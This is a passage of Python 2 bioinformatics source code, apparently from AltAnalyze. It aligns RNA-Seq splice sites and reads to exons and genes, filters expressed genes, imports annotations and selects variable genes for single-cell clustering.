if (abs(ed.ReadStart()-nrd.ExonStart())<3) or (abs(ed.ReadStart()-nrd.ExonStop())<3):
ed.setAlignmentRegion('full-intron') ### this is the start/end of intron coordinates
elif (abs(ed.ReadStart()-nrd.ExonStart())<50) or (abs(ed.ReadStart()-nrd.ExonStop())<50): rd = nrd; updated = 1
except Exception: null=[]
try:
prd = ens_exon_db[gene][index-1]
if (abs(ed.ReadStart()-prd.ExonStart())<3) or (abs(ed.ReadStart()-prd.ExonStop())<3):
ed.setAlignmentRegion('full-intron')### this is the start/end of intron coordinates
elif (abs(ed.ReadStart()-prd.ExonStart())<50) or (abs(ed.ReadStart()-prd.ExonStop())<50):
if updated==1: rd = ord; ###Hence the intron is too small to discriminate between alt5' and alt3' exons
else: rd = prd
except Exception: null=[]
ed.setExonRegionData(rd); aligned_exons+=1; aligned_status=1
if rd.ExonStop()==ed.ReadStart():
ed.setExonRegionID(rd.ExonRegionIDs())
elif rd.ExonStart()==ed.ReadStart():
ed.setExonRegionID(rd.ExonRegionIDs())
elif 'exon-intron' in ed.Annotation(): ### intron retention
ed.setExonRegionID(rd.ExonRegionIDs()) ### Hence there is a 1nt difference between the read and the exon boundary
else:
ed.setExonRegionID(rd.ExonRegionIDs()+'_'+str(ed.ReadStart()))
break
if aligned_status == 0: ### non-exon/intron aligning sequences
region_numbers.sort(); region_starts.sort(); region_stops.sort()
if (rd.Strand() == '+' and ed.ReadStart()>=rd.ExonStop()) or (rd.Strand() == '-' and rd.ExonStop()>=ed.ReadStart()):
### Applicable to 3'UTR (or other trans-splicing) aligning
utr_id = 'U'+str(region_numbers[-1])+'.1_'+str(ed.ReadStart())
ud = EnsemblImport.ExonAnnotationsSimple(rd.Chr(),rd.Strand(),region_stops[-1],region_stops[-1],gene,'','no',utr_id,'','')
ed.setExonRegionID(utr_id)
else:
### Applicable to 5'UTR (or other trans-splicing) aligning
utr_id = 'U0.1'+'_'+str(ed.ReadStart())
ud = EnsemblImport.ExonAnnotationsSimple(rd.Chr(),rd.Strand(),region_starts[0],region_starts[0],gene,'','no',utr_id,'','')
ed.setExonRegionID(utr_id)
ed.setExonRegionData(ud)
ed.setAlignmentRegion('UTR')
except Exception: null=[]
if testImport == 'yes': print aligned_exons, 'splice sites aligned to exon region out of', examined_exons
def geneAlign(chr,chr_gene_locations,location_gene_db,chr_reads,switch_coord,read_aligned_to_gene):
""" This function aligns the start or end position for each feature (junction or exon) to a gene, in two
steps by calling this function twice. In the second iteration, the coordinates are reversed """
index = 0 ### Don't examine genes already looked at
genes_assigned = 0; trans_splicing=[]
for (coord,ji) in chr_reads: ### junction coordinates or exon coordinates with gene object
if index >5: index -=5 ### It is possible for some genes to overlap, so set back the index of genomically ranked genes each time
gene_id_obtained = 'no'
if switch_coord == 'no': rs,re=coord ### reverse the coordinates for the second iteration
else: re,rs=coord ### first-iteration coordinates (start and end)
while index < len(chr_gene_locations):
cs,ce = chr_gene_locations[index]
#print [re,rs,cs,ce, ji.Chromosome()];sys.exit()
### Determine if the first listed coordinate lies within the gene
if cs <= rs and ce >= rs:
### Yes, it does
gene,strand = location_gene_db[chr,cs,ce]
if switch_coord == 'yes': ### Only applies to coordinates, where the end-position didn't lie in the same gene as the start-position
if cs <= re and ce >= re:
### This occurs when the first iteration detects a partial overlap, but the gene containing both coordinates is downstream
### Hence, not trans-splicing
ji.setGeneID(gene)
break
first_geneid = ji.GeneID() ### see what gene was assigned in the first iteration (start position only)
#print ['trans',coord, first_geneid, gene] ### Note: in rare cases, an exon can overlap with two genes (bad Ensembl annotations?)
ji.setTransSplicing()
side = ji.checkExonPosition(rs)
if side == 'left':
ji.setGeneID(gene)
ji.setSecondaryGeneID(first_geneid)
else:
ji.setSecondaryGeneID(gene)
#if ji.GeneID() == None: print 'B',coord, ji.GeneID(), secondaryGeneID()
#print ji.GeneID(), ji.SecondaryGeneID();kill
genes_assigned+=1; gene_id_obtained = 'yes'
### Check to see if this gene represents a multi-gene spanning region (overlaps with multiple gene loci)
try:
### This code was used to check whether the gene is multi-spanning. The < sign appears to be wrong; in any case, never go to the next gene unless the next read has passed it
#cs2,ce2 = chr_gene_locations[index+1]
#if cs2 < ce: index+=1 ### Continue analysis (if above is correct, the gene will have already been assigned)
#else: break
break
except Exception: break
else:
### First iteration, store the identified gene ID (only looking at the start position)
ji.setGeneID(gene); gene_id_obtained = 'yes'
#print gene, rs, re, cs, ce
### Check the end position, to ensure it is also lies within the gene region
if cs <= re and ce >= re:
genes_assigned+=1
else:
### Hence, the end lies outside the gene region
trans_splicing.append((coord,ji))
### Check to see if this gene represents a multi-gene spanning region (overlaps with multiple gene loci)
try:
### This code was used to check whether the gene is multi-spanning. The < sign appears to be wrong; in any case, never go to the next gene unless the next read has passed it
#cs2,ce2 = chr_gene_locations[index+1]
#if cs2 < ce: index+=1 ### Continue analysis (if above is correct, the gene will have already been assigned)
#else: break
break
except Exception: break
else:
if rs < ce and re < ce: break
elif switch_coord == 'no' and cs <= re and ce >= re:
### This can occur if the left junction splice site is in an exon and the other is the UTR as opposed to another gene
gene,strand = location_gene_db[chr,cs,ce]
ji.setSecondaryGeneID(gene); gene_id_obtained = 'yes'
#print gene, coord, ji.Strand(), ji.GeneID()
index+=1
if gene_id_obtained == 'no':
### These often appear to be genes predicted by tBLASTn at UCSC but not by Ensembl (e.g., chr17:27,089,652-27,092,318 mouse mm9)
null=[]
#ji.setGeneID(None) ### This is not necessary, since if one exon does not align to a gene it is still a valid alignment
#print chr,coord
read_aligned_to_gene += genes_assigned
#print genes_assigned, chr, 'Gene IDs assigned out of', len(chr_reads)
#print len(trans_splicing),'reads with evidence of trans-splicing'
### For any coordinate-pair where the end-position doesn't lie within the same gene as the start, re-run for those to see which gene they are in
if switch_coord == 'no' and len(trans_splicing)>0:
read_aligned_to_gene = geneAlign(chr,chr_gene_locations,location_gene_db,trans_splicing,'yes',read_aligned_to_gene)
return read_aligned_to_gene
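### Minimal, self-contained sketch of the interval-containment logic at the core of geneAlign above: each
### end of a feature is assigned to the gene whose genomic interval contains it, and differing assignments
### for the two ends flag putative trans-splicing. Gene boundaries and coordinates below are hypothetical;
### the real function additionally walks a genomically sorted gene list and re-runs with reversed coordinates.
def exampleAssignReadToGenes(read_start, read_end, sorted_gene_locations):
    ### sorted_gene_locations: list of (start, stop, geneID) tuples, genomically sorted
    start_gene=None; end_gene=None
    for (cs,ce,gene) in sorted_gene_locations:
        if cs <= read_start and ce >= read_start: start_gene = gene
        if cs <= read_end and ce >= read_end: end_gene = gene
    trans_splicing = start_gene != None and end_gene != None and start_gene != end_gene
    return start_gene, end_gene, trans_splicing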
def getNovelExonCoordinates(species,root_dir):
""" Currently, any novel exon determined during initial RNA-Seq read annotation with defined start and end coordinates, only has
the exon-end coordinate, not start, in its name. However, the start and stop are indicated in the counts.Experiment.txt file.
To get this, we parse that file and only store exons with an I or U in them and then correct for this in the matching function below """
exp_dir = root_dir+'/ExpressionInput/'
dir_list = read_directory(exp_dir)
counts_file = None
for file in dir_list:
if 'counts.' in file and 'steady' not in file:
counts_file = file
### Example
#ENSG00000137076:I17.1_35718353=chr9:35718353-35718403 (novel exon coordinates - just sorted, not necessarily in the correct order)
#ENSG00000137076:E17.1-I17.1_35718403=chr9:35718809-35718403 (5' supporting junction)
#ENSG00000137076:I17.1_35718353-E18.1=chr9:35718353-35717783 (3' supporting junction)
#here, once we see that I17.1_35718353 is the exon ID, we know we need to get the junction with -I17.1_35718403 (always the second value)
if counts_file!=None:
fn=filepath(exp_dir+counts_file)
print 'Reading counts file'
novel_exon_db = parseCountFile(fn,'exons',{}) ### Get novel exons
print 'Reading counts file'
novel_exon_db = parseCountFile(fn,'junctions',novel_exon_db) ### Get novel exons
return novel_exon_db
def getMaxCounts(fn,cutoff,filterExport=False,filterExportDir=False):
firstLine=True
expressed_uids={}
if filterExport != False:
eo=export.ExportFile(filterExportDir)
for line in open(fn,'rU').xreadlines():
Line = cleanUpLine(line)
t = string.split(Line,'\t')
key = t[0]
if firstLine:
firstLine = False
if filterExport != False:
eo.write(line)
else:
if filterExport != False:
if key in filterExport:
eo.write(line)
else:
try: uid, coordinates = string.split(key,'=')
except Exception: uid = key
try: maxExp = max(map(lambda x: float(x), t[1:])); #print maxExp;sys.exit()
except Exception:
#print t[1:];sys.exit()
if 'NA' in t[1:]:
tn = [0 if x=='NA' else x for x in t[1:]] ### Replace NAs
maxExp = max(map(lambda x: float(x), tn))
elif '' in t[1:]:
tn = [0 if x=='' else x for x in t[1:]] ### Replace blanks
maxExp = max(map(lambda x: float(x), tn))
else:
maxExp=cutoff+1
#gene = string.split(uid,':')[0]
if maxExp > cutoff:
expressed_uids[uid] = []
return expressed_uids
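### Hedged usage sketch for getMaxCounts above (path and cutoff are hypothetical): returns the feature IDs
### whose maximum value across all samples exceeds the cutoff, used downstream to restrict the analysis.
#expressed_uids = getMaxCounts('/data/ExpressionInput/exp.MyDataset.txt',1)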
def check_for_ADT(gene):
if '.ADT' in gene or '-ADT' in gene:
return True
elif len(gene)>17 and '-' in gene:
if len(string.split(gene,'-')[1])>11:
return True
else:
return False
else:
return False
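### Illustrative, self-contained checks for the ADT naming heuristic above (symbols are hypothetical;
### ADT presumably refers to antibody-derived tags in CITE-seq style datasets).
def exampleADTChecks():
    assert check_for_ADT('CD3E-ADT') ### explicit ADT suffix
    assert check_for_ADT('CD4-TotalSeqB123456') ### long name with a long post-dash segment
    assert not check_for_ADT('ENSG00000141510') ### ordinary Ensembl gene ID
    return True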
def importBiologicalRelationships(species):
### Combine non-coding Ensembl gene annotations with UniProt functional annotations
import ExpressionBuilder
custom_annotation_dbase={}
try: coding_db = ExpressionBuilder.importTranscriptBiotypeAnnotations(species)
except Exception: coding_db = {}
try: gene_to_symbol_db = ExpressionBuilder.importGeneAnnotations(species)
except Exception: gene_to_symbol_db = {}
for gene in coding_db:
#coding_type = string.split(coding_db[gene][-1],'|')
coding_type = coding_db[gene][-1]
if 'protein_coding' in coding_type:
coding_type = 'protein_coding'
else:
coding_type = 'ncRNA'
status = check_for_ADT(gene)
if gene in gene_to_symbol_db:
symbol = string.lower(gene_to_symbol_db[gene][0])
### The below genes cause issues with many single cell datasets in terms of being highly correlated
if 'rpl'==symbol[:3] or 'rps'==symbol[:3] or 'mt-'==symbol[:3] or '.' in symbol or 'gm'==symbol[:2]:
coding_type = 'ncRNA'
try: gene_db = custom_annotation_dbase[coding_type]; gene_db[gene]=[]
except Exception: custom_annotation_dbase[coding_type] = {gene:[]}
filename = 'AltDatabase/uniprot/'+species+'/custom_annotations.txt'
fn=filepath(filename)
for line in open(fn,'rU').xreadlines():
data = cleanUpLine(line)
t = string.split(data,'\t')
ens_gene,compartment,custom_class = t[:3]
if 'GPCR' in custom_class:
custom_class = ['GPCR']
else:
custom_class = string.split(custom_class,'|')
custom_class = string.split(compartment,'|')+custom_class
for cc in custom_class:
try: gene_db = custom_annotation_dbase[cc]; gene_db[ens_gene]=[]
except Exception: custom_annotation_dbase[cc] = {ens_gene:[]}
#custom_annotation_dbase={}
try:
filename = 'AltDatabase/goelite/'+species+'/gene-mapp/Ensembl-BioMarkers.txt'
fn=filepath(filename)
for line in open(fn,'rU').xreadlines():
data = cleanUpLine(line)
t = string.split(data,'\t')
gene,null,celltype = t[:3]
try: gene_db = custom_annotation_dbase['BioMarker']; gene_db[gene]=[]
except Exception: custom_annotation_dbase['BioMarker'] = {gene:[]}
#print len(custom_annotation_dbase), 'gene classes imported'
except Exception: pass
return custom_annotation_dbase
def importGeneSets(geneSetType,filterType=None,geneAnnotations=None,speciesName=None):
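### Import a gene-set or Ontology annotation file for the species and return gene-to-category associations; when filterType
### is supplied, only genes annotated with that category (and present in geneAnnotations) are returned, keyed by symbol.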
try: speciesName = species
except: pass
gene_db={}
if 'Ontology' in geneSetType:
filename = 'AltDatabase/goelite/'+speciesName+'/nested/Ensembl_to_Nested-GO.txt'
ontology=True
else:
filename = 'AltDatabase/goelite/'+speciesName+'/gene-mapp/Ensembl-'+geneSetType+'.txt'
ontology=False
fn=filepath(filename)
for line in open(fn,'rU').xreadlines():
data = cleanUpLine(line)
t = string.split(data,'\t')
if ontology:
gene,category = t
else: gene,null,category = t[:3]
if filterType==None:
try: gene_db[gene].append(category)
except Exception: gene_db[gene] = [category]
elif filterType in category:
if gene in geneAnnotations:
gene = geneAnnotations[gene][0]
gene_db[gene]=[]
return gene_db
def singleCellRNASeqWorkflow(Species, platform, expFile, mlp, exp_threshold=0, rpkm_threshold=5, drivers=False, parameters = None, reportOnly=False):
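### Entry point for the unsupervised (ICGS-style) single-cell workflow: filter features by expression and count cutoffs,
### optionally remove outlier samples and restrict to protein-coding genes, then pass the retained IDs to findCommonExpressionProfiles.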
global species
global rho_cutoff
species = Species
removeOutliers = False
if parameters != None:
rpkm_threshold = parameters.ExpressionCutoff()
exp_threshold = parameters.CountsCutoff()
rho_cutoff = parameters.RhoCutoff()
restrictBy = parameters.RestrictBy()
try: removeOutliers = parameters.RemoveOutliers()
except Exception: pass
if platform == 'exons' or platform == 'PSI':
rpkm_threshold=0
exp_threshold=0
else:
rho_cutoff = 0.4
restrictBy = 'protein_coding'
onlyIncludeDrivers=True
if platform != 'exons' and platform != 'PSI':
platform = checkExpressionFileFormat(expFile,platform)
if platform != 'RNASeq':
if rpkm_threshold>1.9999:
rpkm_threshold = math.log(rpkm_threshold,2) ### log2 transform
if removeOutliers:
### Remove samples with low relative number of genes expressed
try:
print '***Removing outlier samples***'
from import_scripts import sampleIndexSelection
reload(sampleIndexSelection)
output_file = expFile[:-4]+'-OutliersRemoved.txt'
sampleIndexSelection.statisticallyFilterFile(expFile,output_file,rpkm_threshold)
if 'exp.' in expFile:
### move the original groups and comps files
groups_file = string.replace(expFile,'exp.','groups.')
groups_file = string.replace(groups_file,'-steady-state','')
groups_filtered_file = groups_file[:-4]+'-OutliersRemoved.txt'
comps_file = string.replace(groups_file,'groups.','comps.')
comps_filtered_file = string.replace(groups_filtered_file,'groups.','comps.')
#counts_file = string.replace(expFile,'exp.','counts.')
#counts_filtered_file = string.replace(output_file,'exp.','counts.')
try: shutil.copyfile(groups_file,groups_filtered_file) ### if present copy over
except Exception: pass
try: shutil.copyfile(comps_file,comps_filtered_file) ### if present copy over
except Exception: pass
#try: shutil.copyfile(counts_file,counts_filtered_file) ### if present copy over
#except Exception: pass
expFile = output_file
print ''
except Exception:
print '***Filtering FAILED***'
print traceback.format_exc()
expressed_uids_rpkm = getMaxCounts(expFile,rpkm_threshold)
try: expressed_uids_counts = getMaxCounts(string.replace(expFile,'exp.','counts.'),exp_threshold)
except Exception: expressed_uids_counts=expressed_uids_rpkm
if len(expressed_uids_counts) > 0:
try: expressed_uids = expressed_uids_rpkm.viewkeys() & expressed_uids_counts.viewkeys() ### common
except Exception: expressed_uids = getOverlappingKeys(expressed_uids_rpkm,expressed_uids_counts)
else:
expressed_uids = expressed_uids_rpkm
if reportOnly:
print '.',
else:
print 'Genes filtered by counts:',len(expressed_uids_counts)
print 'Genes filtered by expression:',len(expressed_uids_rpkm),len(expressed_uids)
#expressed_uids = filterByProteinAnnotation(species,expressed_uids)
print len(expressed_uids), 'expressed genes by RPKM/TPM (%d) and counts (%d)' % (rpkm_threshold,exp_threshold)
from import_scripts import OBO_import; import ExpressionBuilder
gene_to_symbol_db = ExpressionBuilder.importGeneAnnotations(species)
try: biological_categories = importBiologicalRelationships(species)
except Exception:
restrictBy = None
biological_categories={}
print 'Missing annotation file in:','AltDatabase/uniprot/'+species+'/custom_annotations.txt !!!!!'
if restrictBy !=None:
if reportOnly:
print '.',
else:
print 'Attempting to restrict analysis to protein coding genes only (flag --RestrictBy protein_coding)'
genes = biological_categories['protein_coding']
genes_temp=dict(genes)
for gene in genes_temp:
if gene in gene_to_symbol_db:
genes[gene_to_symbol_db[gene][0]]=[] ### add symbols
genes_temp={}
else:
genes = {}
for i in expressed_uids: genes[i]=[]
"""
genes.update(biological_categories['BioMarker'])
genes.update(biological_categories['transcription regulator'])
genes.update(biological_categories['splicing regulator'])
genes.update(biological_categories['kinase'])
genes.update(biological_categories['GPCR'])
"""
expressed_uids_db={}; guide_genes={}
for id in expressed_uids: expressed_uids_db[id]=[]
if platform == 'exons' or platform == 'PSI': ### For splicing-index value filtering
expressed_uids=[]
for uid in expressed_uids_db:
geneID = string.split(uid,':')[0]
geneID = string.split(geneID,' ')[-1]
if geneID in genes: expressed_uids.append(uid)
else:
expressed_uids2=[]
for gene in expressed_uids:
ADT_status = check_for_ADT(gene)
if ADT_status:
expressed_uids2.append(gene)
elif gene in genes:
expressed_uids2.append(gene)
expressed_uids = expressed_uids2
expressed_uids_db2={}
for id in expressed_uids: expressed_uids_db2[id]=[]
if drivers != False:
guide_genes = getDrivers(drivers)
if onlyIncludeDrivers:
try: expressed_uids = guide_genes.viewkeys() & expressed_uids_db2.viewkeys() ### common
except Exception: expressed_uids = getOverlappingKeys(guide_genes,expressed_uids_db2)
if len(expressed_uids)<100:
print '\nNOTE: The input IDs do not sufficiently map to annotated protein coding genes...',
print 'skipping protein coding annotation filtering.'
expressed_uids=[]
for uid in expressed_uids_db:
expressed_uids.append(uid)
if reportOnly:
print '.',
else:
print len(expressed_uids), 'expressed IDs being further analyzed'
print_out,n = findCommonExpressionProfiles(expFile,species,platform,expressed_uids,guide_genes,mlp,parameters=parameters,reportOnly=reportOnly)
return print_out,n
def getOverlappingKeys(db1,db2):
db3=[]
for key in db1:
if key in db2:
db3.append(key)
return db3
def getDrivers(filename):
fn = filepath(filename)
firstLine=True
drivers={}
for line in open(fn,'rU').xreadlines():
line = line.rstrip()
t = string.split(line,'\t')
if firstLine: firstLine = False
else:
gene = t[0]
drivers[gene]=[]
print 'Imported %d guide genes' % len(drivers)
return drivers
def filterByProteinAnnotation(species,expressed_uids):
import ExpressionBuilder
custom_annotation_dbase = ExpressionBuilder.importTranscriptBiotypeAnnotations(species)
expressed_uids_protein=[]
for gene in expressed_uids:
if gene in custom_annotation_dbase:
compartment,custom_class = custom_annotation_dbase[gene]
if 'protein_coding' in custom_class:
expressed_uids_protein.append(gene)
if len(expressed_uids_protein)>10:
return expressed_uids_protein
else:
return expressed_uids
def CoeffVar(expFile,platform,expressed_uids,fold=2,samplesDiffering=2,guideGenes=[]):
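### Alternative gene-selection strategy: rank expressed features by coefficient of variation (stdev/mean), require a minimum
### fold (RNASeq ratio) or absolute difference between the high and low samples, and keep the top 5000 plus any guide genes.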
firstLine=True
expressed_values={}
expressed_values_filtered={}
cv_list=[]
for line in open(expFile,'rU').xreadlines():
key = string.split(line,'\t')[0]
t = string.split(line,'\t')
if firstLine:
headers = line
firstLine = False
else:
try: uid, coordinates = string.split(key,'=')
except Exception: uid = key
values = map(lambda x: float(x), t[1:])
#gene = string.split(uid,':')[0]
if uid in expressed_uids:
vs = list(values); vs.sort()
cv = statistics.stdev(values)/statistics.avg(values)
if samplesDiffering<1: samplesDiffering=1
if platform == 'RNASeq':
if (vs[-1*samplesDiffering]/vs[samplesDiffering])>fold: ### Ensures that at least 2*samplesDiffering samples are significantly different in the set
expressed_values[uid] = values
cv_list.append((cv,uid))
else:
if (vs[-1*samplesDiffering]-vs[samplesDiffering])>fold: ### Ensures that at least 2*samplesDiffering samples are significantly different in the set
expressed_values[uid] = values
cv_list.append((cv,uid))
if uid in guideGenes:
expressed_values[uid] = values
cv_list.append((10000,uid)) ### Very high CV
cv_list.sort()
cv_list.reverse()
x=0
for (cv,uid) in cv_list:
x+=1
"""
if uid == 'ENSMUSG00000003882':
print x, 'ilr7'
"""
for (cv,uid) in cv_list[:5000]:
expressed_values_filtered[uid] = expressed_values[uid]
return expressed_values_filtered, fold, samplesDiffering, headers
def determinePattern(vs):
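### Heuristic on a sorted expression vector: compare the value at the mean to a mid-range value; a ratio near 1 suggests
### a sigmoidal or linear pattern (see the inline note below).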
max_vs = max(vs)
min_vs = min(vs)
lower_max = max_vs - (max_vs*0.01)
upper_min = abs(max_vs)*0.01
s = bisect.bisect_right(vs,upper_min) ### index of the first value above 1% of the max
e = bisect.bisect_left(vs,lower_max) ### index of the last value below 99% of the max
#print vs
#print max_vs, min_vs
#print lower_max, upper_min
#print s, e
avg = statistics.avg(vs[s:e+1])
m = bisect.bisect_left(vs,avg)
ratio = vs[m]/vs[((e-s)/2)+s-2] ### If the ratio is close to 1, a sigmoidal or linear pattern likely exists
print ratio
#sys.exit()
return ratio
def checkExpressionFileFormat(expFile,platform):
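### Infer the scale of the input matrix: a maximum value above 100 implies non-log data (treated as 'RNASeq'),
### otherwise the values are assumed to already be log2 and the platform is set to "3'array".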
firstLine=True
inputMax=0; inputMin=10000
expressed_values={}
rows=0
for line in open(expFile,'rU').xreadlines():
key = string.split(line,'\t')[0]
t = string.split(line,'\t')
if firstLine:
headers = line
firstLine = False
else:
try: uid, coordinates = string.split(key,'=')
except Exception: uid = key
try: values = map(lambda x: float(x), t[1:])
except Exception:
values=[]
for value in t[1:]:
try: values.append(float(value))
except Exception:pass
try:
if max(values)>inputMax: inputMax = max(values)
except Exception:
pass
if inputMax>100:
break
if inputMax>100: ### Thus, not log values
platform = 'RNASeq'
else:
platform = "3'array"
return platform
def optimizeNumberOfGenesForDiscovery(expFile,platform,expressed_uids,fold=2,samplesDiffering=2,guideGenes=[],reportOnly=False):
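### Recursively tune the fold and samplesDiffering thresholds until a workable number of variable genes (roughly 50-15,000)
### is retained for clustering; with reportOnly=True only the gene IDs are stored, not their expression values.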
firstLine=True
expressed_values={}
for line in open(expFile,'rU').xreadlines():
key = string.split(line,'\t')[0]
t = string.split(line,'\t')
if firstLine:
headers = line
firstLine = False
else:
try: uid, coordinates = string.split(key,'=')
except Exception: uid = key
try: values = map(lambda x: float(x), t[1:])
except Exception:
values = t[1:]
if 'NA' in values:
values = [0 if x=='NA' else x for x in values] ### Replace NAs
values = map(lambda x: float(x), values)
else:
values=[]
for value in t[1:]:
try: values.append(float(value))
except Exception: values.append(-9999)
values = numpy.ma.masked_values(values, -9999.)
#gene = string.split(uid,':')[0]
#if uid == 'ENSMUSG00000041515': print 'IRF8'
if uid in expressed_uids:
#slope_exp_ratio = determinePattern(vs)
#if slope_exp_ratio<2 and slope_exp_ratio>0.5:
if platform == 'RNASeq':
try: values = map(lambda x: math.log(x+1,2),values)
except Exception:
if 'NA' in values:
values = [0 if x=='NA' else x for x in values] ### Replace NAs
values = map(lambda x: math.log(x+1,2),values)
elif '' in values:
values = [0 if x=='' else x for x in values] ### Replace NAs
values = map(lambda x: math.log(x+1,2),values)
vs = list(values); vs.sort()
if (vs[-1*samplesDiffering]-vs[samplesDiffering-1])>math.log(fold,2): ### Ensures that at least 2*samplesDiffering samples are significantly different in the set
if reportOnly==False:
expressed_values[uid] = values
else:
expressed_values[uid]=[] ### Don't store the values - datasets can contain tens of thousands of cells
else:
vs = list(values); vs.sort()
if (vs[-1*samplesDiffering]-vs[samplesDiffering-1])>math.log(fold,2): ### Ensures that at least 2*samplesDiffering samples are significantly different in the set
if reportOnly==False:
expressed_values[uid] = values
else:
expressed_values[uid]=[]
if uid in guideGenes:
expressed_values[uid] = values
#if uid == 'ENSMUSG00000062825': print (vs[-1*samplesDiffering]-vs[samplesDiffering]),math.log(fold,2);sys.exit()
if reportOnly:
print '.',
else:
print len(expressed_uids),'genes examined and', len(expressed_values),'genes expressed for a fold cutoff of', fold
if len(expressed_uids)==0 or len(expressed_values)==0:
print options_result_in_no_genes
elif len(expressed_uids) < 50 and len(expressed_values)>0:
return expressed_values, fold, samplesDiffering, headers
elif len(expressed_values)>15000:
if platform == 'exons' or platform == 'PSI':
fold+=0.1
else:
fold+=1
samplesDiffering+=1
expressed_values, fold, samplesDiffering, headers = optimizeNumberOfGenesForDiscovery(expFile,platform,expressed_uids,fold=fold,samplesDiffering=samplesDiffering,guideGenes=guideGenes,reportOnly=reportOnly)
elif fold == 1.2 and samplesDiffering == 1:
return expressed_values, fold, samplesDiffering, headers
elif len(expressed_values)<50:
fold-=0.2
samplesDiffering-=1
if samplesDiffering<1: samplesDiffering = 1
if fold < 1.1: fold = 1.2
expressed_values, fold, samplesDiffering, headers = optimizeNumberOfGenesForDiscovery(expFile,platform,expressed_uids,fold=fold,samplesDiffering=samplesDiffering,guideGenes=guideGenes,reportOnly=reportOnly)
else:
return expressed_values, fold, samplesDiffering, headers
return expressed_values, fold, samplesDiffering, headers
def intraCorrelation(expressed_values,mlp):
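### Split the expressed_values dictionary into chunks and compute all pairwise Pearson correlations in parallel
### using a multiprocessing pool of MultiCorrelatePatterns workers.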
if mlp.cpu_count() < 3:
processors = mlp.cpu_count()
else: processors = 8
pool = mlp.Pool(processes=processors)
si = (len(expressed_values)/processors)
s = si; b=0
db_ls=[]
if len(expressed_values)<10: forceError ### fewer than 10 entries would make si zero and cause an infinite loop below
while s<len(expressed_values):
db_ls.append(dict(expressed_values.items()[b:s]))
b+=si; s+=si
db_ls.append(dict(expressed_values.items()[b:s]))
### Create an instance of MultiZscoreWorker (store the variables to save memory)
workerMulti = MultiCorrelatePatterns(expressed_values)
results = pool.map(workerMulti,db_ls)
#for i in db_ls: workerMulti(i)
pool.close(); pool.join(); pool = None
correlated_genes={}
for a in results:
for k in a: correlated_genes[k] = a[k]
return correlated_genes
def findCommonExpressionProfiles(expFile,species,platform,expressed_uids,guide_genes,mlp,fold=2,samplesDiffering=2,parameters=None,reportOnly=False):
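### Core gene-discovery routine: select variable genes, compute a gene-gene correlation matrix, remove outlier-driven
### correlations, cluster the retained genes and iteratively derive guide-gene sets (Guide1-3) for the final heatmaps.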
use_CV=False
global rho_cutoff
row_metric = 'correlation'; row_method = 'average'
column_metric = 'cosine'; column_method = 'hopach'
original_column_metric = column_metric
original_column_method = column_method
color_gradient = 'yellow_black_blue'; transpose = False; graphic_links=[]
if parameters != None:
try: excludeGuides = parameters.ExcludeGuides() ### Remove signatures
except Exception: excludeGuides = None
fold = parameters.FoldDiff()
samplesDiffering = parameters.SamplesDiffering()
amplifyGenes = parameters.amplifyGenes()
if 'Guide' in parameters.GeneSelection():
amplifyGenes = False ### This occurs when running ICGS with the BOTH option, in which Guide3 genes are retained - ignore these
parameters.setGeneSelection('')
parameters.setClusterGOElite('')
excludeCellCycle = parameters.ExcludeCellCycle()
from visualization_scripts import clustering
row_metric = 'correlation'; row_method = 'average'
column_metric = parameters.ColumnMetric(); column_method = parameters.ColumnMethod()
original_column_metric = column_metric
original_column_method = column_method
color_gradient = 'yellow_black_blue'; graphic_links=[]
if platform == 'exons' or platform =='PSI': color_gradient = 'yellow_black_blue'
guide_genes = parameters.JustShowTheseIDs()
cell_cycle_id_list = []
else:
amplifyGenes = False
excludeCellCycle = False
if platform != 'exons'and platform !='PSI':
platform = checkExpressionFileFormat(expFile,platform)
else:
if LegacyMode: pass
else:
fold = math.pow(2,0.5)
fold = 1.25 ### overrides the sqrt(2) value assigned above
#"""
if use_CV:
expressed_values, fold, samplesDiffering, headers = CoeffVar(expFile,platform,expressed_uids,fold=2,samplesDiffering=2,guideGenes=guide_genes)
else:
if reportOnly:
print '.',
else:
print 'Finding an optimal number of genes based on differing thresholds to include for clustering...'
#fold=1; samplesDiffering=1
expressed_values, fold, samplesDiffering, headers = optimizeNumberOfGenesForDiscovery(expFile,platform,expressed_uids,fold=fold,samplesDiffering=samplesDiffering,guideGenes=guide_genes,reportOnly=reportOnly) #fold=2,samplesDiffering=2
if reportOnly:
print '.',
else:
print 'Evaluating',len(expressed_values),'genes, differentially expressed',fold,'fold for at least',samplesDiffering*2,'samples'
#sys.exit()
from import_scripts import OBO_import; import ExpressionBuilder
gene_to_symbol_db = ExpressionBuilder.importGeneAnnotations(species)
symbol_to_gene = OBO_import.swapKeyValues(gene_to_symbol_db)
areYouSure=False
if (excludeCellCycle == 'strict' or excludeCellCycle == True) and areYouSure:
cc_param = copy.deepcopy(parameters)
cc_param.setPathwaySelect('cell cycle')
cc_param.setGeneSet('GeneOntology')
cc_param.setGeneSelection('amplify')
transpose = cc_param
filtered_file = export.findParentDir(expFile)+'/amplify/'+export.findFilename(expFile)
writeFilteredFile(filtered_file,platform,headers,{},expressed_values,[])
if len(expressed_values)<1000:
row_method = 'hopach'; row_metric = 'correlation'
if column_method != 'hopach': row_method = 'average' ### needed due to PC errors
if len(headers)>7000: ### For very ultra-large datasets
column_method = 'average'
cc_graphic_links = clustering.runHCexplicit(filtered_file, graphic_links, row_method, row_metric, column_method, column_metric, color_gradient, transpose, display=False, Normalize=True, JustShowTheseIDs=guide_genes)
cell_cycle_id_list = genericRowIDImport(string.replace(cc_graphic_links[0][-1],'.png','.txt'))
expressed_values2 = {}
for id in expressed_values:
try: symbolID = gene_to_symbol_db[id][0]
except Exception: symbolID = id
if id not in cell_cycle_id_list and symbolID not in cell_cycle_id_list:
expressed_values2[id]=expressed_values[id]
print len(expressed_values)-len(expressed_values2),'cell-cycle associated genes removed for cluster discovery'
expressed_values = expressed_values2
if reportOnly==False:
print 'amplifyGenes:',amplifyGenes
### Write out filtered list to amplify and to filtered.YourExperiment.txt
filtered_file = export.findParentDir(expFile)+'/amplify/'+export.findFilename(expFile)
groups_file = string.replace(expFile,'exp.','groups.')
groups_filtered_file = string.replace(filtered_file,'exp.','groups.')
groups_file = string.replace(groups_file,'-steady-state','')
groups_filtered_file = string.replace(groups_filtered_file,'-steady-state','')
if reportOnly==False:
try: export.customFileCopy(groups_file,groups_filtered_file) ### if present copy over
except Exception: pass
writeFilteredFile(filtered_file,platform,headers,{},expressed_values,[])
filtered_file_new = string.replace(expFile,'exp.','filteredExp.')
try: export.customFileCopy(filtered_file,filtered_file_new) ### if present copy over
except Exception: pass
else:
filtered_file = writeFilteredFileReimport(expFile,platform,headers,expressed_values) ### expressed_values just contains the UID
